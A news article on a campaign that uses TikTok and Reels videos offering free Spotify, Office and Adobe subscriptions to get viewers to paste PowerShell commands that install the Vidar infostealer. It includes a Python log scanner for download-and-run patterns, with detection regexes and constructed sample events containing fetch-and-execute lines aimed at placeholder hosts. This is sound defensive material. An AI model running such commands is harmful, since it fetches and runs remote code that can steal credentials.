
Hackers Use TikTok Videos Promising Free Spotify Premium to Deploy Malware

A report from ReversingLabs reveals hackers are using TikTok and Instagram Reels videos offering fake free subscriptions to Spotify Premium, Windows, Office, and Adobe to trick victims into running malicious PowerShell commands. The attack installs the Vidar infostealer, which steals passwords, cookies, session tokens, and cryptocurrency wallet data. This marks a shift from email phishing to social engineering on short-form video platforms.

iGEN Editorial
June 12, 2026

A new social engineering campaign is exploiting the popularity of short-form video platforms to deliver password-stealing malware, according to a report from ReversingLabs. Instead of relying on phishing emails, attackers are posting videos on TikTok and Instagram Reels that promise free access to premium subscriptions like Spotify Premium, Windows, Office, and Adobe — an instant red flag, the researchers noted.

How the Attack Works

Victims are instructed to open command-line tools such as PowerShell and paste commands shown in the video. When executed, these commands download and install the Vidar infostealer. This malware targets usernames, passwords, cookies, session tokens, cryptocurrency wallet data, personal files, and other sensitive information.

The method requires more active participation from victims than traditional email phishing — the user must physically input commands into PowerShell. However, the promise of free access to expensive subscriptions exploits current economic pressures, as consumers look for cheap or free alternatives.

Shift in Attack Vectors

Traditional Email Phishing  | New TikTok/Reel Method
Clicking a malicious link   | Running PowerShell commands
Passive victim action       | Active victim input (paste command)
Low-effort for attacker     | Requires victim patience
Targets email inboxes       | Targets social media feeds

According to the ReversingLabs researchers quoted in the TechRadar report, "This kind of social engineering is an easy way for threat actors to drive traffic off social media and onto an attacker-controlled malicious website." The attack marks a notable shift from email-based campaigns to video-based delivery.

Defensive Measures

The report emphasizes that social engineering remains the clearest path for attackers to reach victims. The good news is that basic security principles can mitigate risk:

  • Use multi-factor authentication to secure accounts.
  • Be wary of suspiciously cheap or free products and services.
  • Only download software from official vendors.

For enterprise CTOs and cybersecurity leaders, this campaign underscores the need to extend awareness training beyond email to social media platforms. As remote work and personal device usage blur the lines between corporate and personal environments, employees may inadvertently compromise company credentials. It also highlights the importance of restricting administrative tools like PowerShell on non-administrator endpoints.
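For teams that cannot remove PowerShell from user endpoints, the pasted download-and-run commands described above can still be surfaced from logs. The following is an added example, not code from ReversingLabs or this article: it assumes PowerShell script block logging (event ID 4104) is enabled and that events were exported as JSON lines with hypothetical field names EventID, Computer, User and ScriptBlockText. The sample events and domains are constructed.

```python
import json
import re

# Fetch primitives: cmdlets, their aliases, and .NET WebClient methods.
DOWNLOAD = re.compile(
    r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
    r"start-bitstransfer|downloadstring|downloadfile)\b", re.I)
# Execution primitives that run fetched text or files.
EXECUTE = re.compile(r"\b(invoke-expression|iex|start-process)\b", re.I)
URL_HOST = re.compile(r"https?://([^/\s'\")]+)", re.I)

def find_download_and_run(log_lines):
    """Return alerts for script blocks that both fetch and execute remote content."""
    alerts = []
    for line in log_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate truncated or corrupt export lines
        if event.get("EventID") != 4104:
            continue  # only script block logging events carry the script text
        text = event.get("ScriptBlockText", "")
        fetch, run = DOWNLOAD.search(text), EXECUTE.search(text)
        if fetch and run:
            hosts = sorted({h.lower() for h in URL_HOST.findall(text)})
            alerts.append({"user": event.get("User"),
                           "computer": event.get("Computer"),
                           "fetch": fetch.group(0).lower(),
                           "run": run.group(0).lower(),
                           "remote_hosts": hosts})
    return alerts

# Constructed sample events (assumed export format); domains are placeholders.
SAMPLE_LOG = [json.dumps(e) for e in (
    {"EventID": 4104, "Computer": "LAPTOP-01", "User": "alice",
     "ScriptBlockText": "iex (irm https://free-premium.example.invalid/activate)"},
    {"EventID": 4104, "Computer": "LAPTOP-01", "User": "alice",
     "ScriptBlockText": "Get-ChildItem C:/Users/alice/Documents"},
    {"EventID": 4104, "Computer": "BUILD-07", "User": "svc-report",
     "ScriptBlockText": "Invoke-WebRequest https://updates.example.invalid/r.csv -OutFile r.csv"},
    {"EventID": 4104, "Computer": "LAPTOP-02", "User": "bob",
     "ScriptBlockText": "$c = New-Object Net.WebClient; "
                        "Invoke-Expression $c.DownloadString('http://cdn.example.invalid/a.ps1')"},
)] + ['{"EventID": 4104, "ScriptBlockText": "trunc']  # corrupt line, skipped

if __name__ == "__main__":
    for alert in find_download_and_run(SAMPLE_LOG):
        print(alert)
```

Some legitimate installers use the same fetch-and-execute pattern, so matches are a triage signal to review alongside the user, machine and remote host rather than a verdict.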

Implications for Supply Chain Security

While the campaign targets individual consumers, the stolen credentials — especially session tokens and corporate cloud account passwords — could be repurposed for business email compromise or supply chain attacks. Enterprise procurement teams should note that subscription fraud is not limited to Spotify: attackers are also impersonating Microsoft and Adobe products, which are common in corporate environments. Ensuring strict software procurement policies and monitoring for unauthorized download requests is prudent.

Ultimately, the report from ReversingLabs serves as a reminder that attackers evolve their delivery methods but continue to rely on human psychology. Basic account security measures, such as multi-factor authentication and cautious behavior around unrealistic offers, remain effective defenses.


Sources: TechRadar – Main Feed
